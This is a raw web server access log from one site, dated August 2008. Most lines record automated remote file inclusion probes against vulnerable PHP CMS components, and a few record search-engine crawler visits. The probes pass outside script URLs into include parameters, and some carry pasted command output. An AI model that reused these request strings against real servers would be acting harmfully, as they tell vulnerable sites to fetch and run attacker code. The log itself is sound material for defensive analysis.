221.144.12.141 - - [03/Aug/2008:17:12:15 -0700] "GET /logs/access_080127.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:12:48 -0700] "GET /logs/access_070924.log%20/modules/xfsection/modify.php?dir_module=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
212.227.118.35 - - [03/Aug/2008:17:13:01 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
81.169.158.65 - - [03/Aug/2008:17:13:15 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
81.169.158.65 - - [03/Aug/2008:17:13:15 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
65.55.104.154 - - [03/Aug/2008:17:13:15 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
65.55.104.154 - - [03/Aug/2008:17:13:15 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
67.15.8.80 - - [03/Aug/2008:17:13:16 -0700] "GET /logs/access.log//admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
65.98.89.43 - - [03/Aug/2008:17:13:36 -0700] "GET /logs/access_071112.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.98.89.43 - - [03/Aug/2008:17:13:36 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.98.89.43 - - [03/Aug/2008:17:13:36 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.111.37.210 - - [03/Aug/2008:17:14:32 -0700] "GET /logs/access_071231.log//?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
65.111.37.210 - - [03/Aug/2008:17:14:32 -0700] "GET /logs//?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 200 6091 "-" "libwww-perl/5.805" "summitcircle.com"
67.19.204.226 - - [03/Aug/2008:17:15:20 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.19.204.226 - - [03/Aug/2008:17:15:20 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.19.204.226 - - [03/Aug/2008:17:15:21 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
204.15.10.22 - - [03/Aug/2008:17:15:25 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
204.15.10.22 - - [03/Aug/2008:17:15:25 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
204.15.10.22 - - [03/Aug/2008:17:15:25 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.19.204.226 - - [03/Aug/2008:17:15:43 -0700] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
204.15.10.22 - - [03/Aug/2008:17:16:34 -0700] "GET /logs/access_080210.log/modules/xfsection/modify.php?dir_module=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:17:30 -0700] "GET /modules/xfsection/modify.php?dir_module=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.22.89.194 - - [03/Aug/2008:17:17:42 -0700] "GET /logs/access_071001.log%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:17:20:25 -0700] "GET /logs/access_071105.log//components/com_simpleboard/image_upload.php?sbp=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:17:20:25 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:17:20:26 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:17:20:32 -0700] "GET /logs/access_071015.log//components/com_simpleboard/image_upload.php?sbp=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:17:20:34 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:17:20:35 -0700] "GET /modules/xfsection/modify.php?dir_module=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:17:20:35 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
74.186.19.99 - - [03/Aug/2008:17:20:53 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2000.2472-big; Windows XP 5.1; MSIE 7.0.5730.13)" "www.summitcircle.com"
74.186.19.99 - - [03/Aug/2008:17:20:54 -0700] "GET /favicon.gif HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2000.2472-big; Windows XP 5.1; MSIE 7.0.5730.13)" "www.summitcircle.com"
82.146.39.200 - - [03/Aug/2008:17:21:56 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
195.93.200.219 - - [03/Aug/2008:17:22:14 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
65.111.37.210 - - [03/Aug/2008:17:23:15 -0700] "GET /modules/xfsection/modify.php?dir_module=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
65.111.37.210 - - [03/Aug/2008:17:23:15 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
125.24.4.226 - - [03/Aug/2008:17:23:30 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
204.15.10.22 - - [03/Aug/2008:17:24:47 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
204.15.10.22 - - [03/Aug/2008:17:24:47 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
204.15.10.22 - - [03/Aug/2008:17:24:47 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:17:25:20 -0700] "GET /logs/access_080210.log/modules/xfsection/modify.php?dir_module=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
216.117.129.77 - - [03/Aug/2008:17:26:40 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.117.129.77 - - [03/Aug/2008:17:26:40 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.117.129.77 - - [03/Aug/2008:17:26:40 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.117.129.77 - - [03/Aug/2008:17:27:06 -0700] "GET /logs/access_080210.log/modules/xfsection/modify.php?dir_module=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.207.2.62 - - [03/Aug/2008:17:27:13 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
200.207.2.62 - - [03/Aug/2008:17:27:13 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
200.207.2.62 - - [03/Aug/2008:17:27:14 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
200.206.182.158 - - [03/Aug/2008:17:28:54 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.206.182.158 - - [03/Aug/2008:17:28:59 -0700] "GET /modules/xfsection/modify.php?dir_module=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
81.208.99.74 - - [03/Aug/2008:17:28:59 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
81.208.99.74 - - [03/Aug/2008:17:28:59 -0700] "GET /modules/xfsection/modify.php?dir_module=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
81.208.99.74 - - [03/Aug/2008:17:28:59 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.206.182.158 - - [03/Aug/2008:17:29:03 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.204.109.42 - - [03/Aug/2008:17:30:03 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.204.109.42 - - [03/Aug/2008:17:30:03 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.204.109.42 - - [03/Aug/2008:17:30:04 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
65.111.37.210 - - [03/Aug/2008:17:30:54 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
65.111.37.210 - - [03/Aug/2008:17:30:54 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.117.129.77 - - [03/Aug/2008:17:30:59 -0700] "GET /logs/access_070924.log%20/modules/xfsection/modify.php?dir_module=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.111.37.210 - - [03/Aug/2008:17:30:59 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
65.111.37.210 - - [03/Aug/2008:17:30:59 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.65.34.76 - - [03/Aug/2008:17:31:12 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
62.65.34.76 - - [03/Aug/2008:17:31:18 -0700] "GET /modules/xfsection/modify.php?dir_module=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
65.111.37.210 - - [03/Aug/2008:17:31:57 -0700] "GET /logs/access_080210.log/modules/xfsection/modify.php?dir_module=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
65.111.37.210 - - [03/Aug/2008:17:32:03 -0700] "GET /logs/access_080210.log/modules/xfsection/modify.php?dir_module=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.113.86.1 - - [03/Aug/2008:17:32:43 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.113.86.1 - - [03/Aug/2008:17:32:43 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:17:32:44 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:17:32:45 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
218.188.33.2 - - [03/Aug/2008:17:32:46 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
67.19.204.226 - - [03/Aug/2008:17:33:17 -0700] "GET /logs/access_080204.log/lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.19.204.226 - - [03/Aug/2008:17:33:18 -0700] "GET /lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.19.204.226 - - [03/Aug/2008:17:33:18 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.207.2.62 - - [03/Aug/2008:17:33:19 -0700] "GET /logs/access_080210.log/modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
62.65.34.76 - - [03/Aug/2008:17:34:19 -0700] "GET /logs/access_071112.log/modules/xfsection/modify.php?dir_module=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
65.98.89.43 - - [03/Aug/2008:17:34:24 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
62.65.34.76 - - [03/Aug/2008:17:34:24 -0700] "GET /modules/xfsection/modify.php?dir_module=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
74.6.17.184 - - [03/Aug/2008:17:34:29 -0700] "GET /logs/access_080519.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
62.65.34.76 - - [03/Aug/2008:17:34:29 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
209.172.33.53 - - [03/Aug/2008:17:34:51 -0700] "GET /logs/?sourcedir=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 200 6086 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.172.33.53 - - [03/Aug/2008:17:34:51 -0700] "GET /?sourcedir=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.19.204.226 - - [03/Aug/2008:17:36:30 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.206.182.158 - - [03/Aug/2008:17:36:51 -0700] "GET /logs/access_080210.log/modules/xfsection/modify.php?dir_module=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.204.109.42 - - [03/Aug/2008:17:40:14 -0700] "GET /logs/access_080210.log/modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.146.39.200 - - [03/Aug/2008:17:42:00 -0700] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
82.146.39.200 - - [03/Aug/2008:17:42:00 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
82.146.39.200 - - [03/Aug/2008:17:42:00 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
62.65.34.76 - - [03/Aug/2008:17:43:13 -0700] "GET /modules/xfsection/modify.php?dir_module=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.246.78.8 - - [03/Aug/2008:17:48:44 -0700] "GET ///vwar/backup/errors.php?error=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
216.246.78.8 - - [03/Aug/2008:17:48:46 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
65.55.208.17 - - [03/Aug/2008:17:49:50 -0700] "GET /logs/ HTTP/1.1" 200 6086 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
67.15.8.80 - - [03/Aug/2008:17:52:07 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:17:52:19 -0700] "GET /logs/access_071105.log//components/com_simpleboard/image_upload.php?sbp=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:17:52:19 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:17:52:19 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.15.8.80 - - [03/Aug/2008:17:52:21 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.15.8.80 - - [03/Aug/2008:17:52:22 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
87.106.191.163 - - [03/Aug/2008:17:52:25 -0700] "GET /logs/access_071015.log//components/com_simpleboard/image_upload.php?sbp=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:17:54:10 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:17:54:11 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:17:54:11 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.65.34.76 - - [03/Aug/2008:17:54:20 -0700] "GET /logs/access_080210.log/modules/xfsection/modify.php?dir_module=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
